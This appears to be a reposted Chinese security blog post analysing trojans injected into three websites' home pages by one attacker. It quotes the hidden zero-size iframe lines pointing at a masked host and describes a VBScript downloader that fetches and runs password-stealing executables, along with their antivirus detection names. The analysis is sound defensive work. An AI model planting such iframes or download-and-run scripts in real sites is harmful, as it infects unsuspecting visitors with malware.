3个网站被挂上的木马出自一家

小咪咪 2024-04-20 11:17 35阅读 0赞

**endurer**　原创

2006-09-18　第**1**版

**第1个网站** 首页被加入的的代码：  
/-------  
＜iframe src='htxxp://www.\*\*\*.why\*\*\*all.com/1' width='0' height='0' frameborder='0'＞＜/iframe＞  
\-------/

**1.htm** 内容为加入多余空格的VBScript脚本代码。（瑞星报为： **Trojan.DL.VBS.Agent.r**，Kaserpsky报为：**Trojan-Downloader.JS.Agent.ba**）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.\*\*\*.why\*\*\*all.com/1/test.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

**test.exe** 采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳，长度为 85,930 字节。Kaserpsky报为：**Trojan-PSW.Win32.WOW.iu**。

**第2个网站** 首页被加入的的代码：  
/-------  
＜iframe src='htxxp://www.\*\*\*.why\*\*\*all.com/2' width='0' height='0' frameborder='0'＞＜/iframe＞  
\-------/

**2.htm** 内容为加入多余空格的VBScript脚本代码。（瑞星报为： **Trojan.DL.VBS.Agent.r**，Kaserpsky报为：**Trojan-Downloader.JS.Agent.ba**）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.\*\*\*.why\*\*\*all.com/2/du.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

**du.exe** 采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳，文件大小为12,286 字节，  
Kaserpsky报为：**Trojan-Downloader.Win32.Delf.aul**，瑞星报为： **Trojan.DL.Delf.cwh**。

**第3个网站** 首页被加入的的代码：  
/-------  
＜iframe src='htxxp://www.\*\*\*.why\*\*\*all.com/3' width='0' height='0' frameborder='0'＞＜/iframe＞  
\-------/

**3.htm** 内容为加入多余空格的VBScript脚本代码。（瑞星报为： **Trojan.DL.VBS.Agent.r**，Kaserpsky报为：**Trojan-Downloader.JS.Agent.ba**）

该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 htxxp://www.\*\*\*.why\*\*\*all.com/3/du.exe，保存为 %temp% 中的 test.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

**du.exe** 与2.htm下载的相同。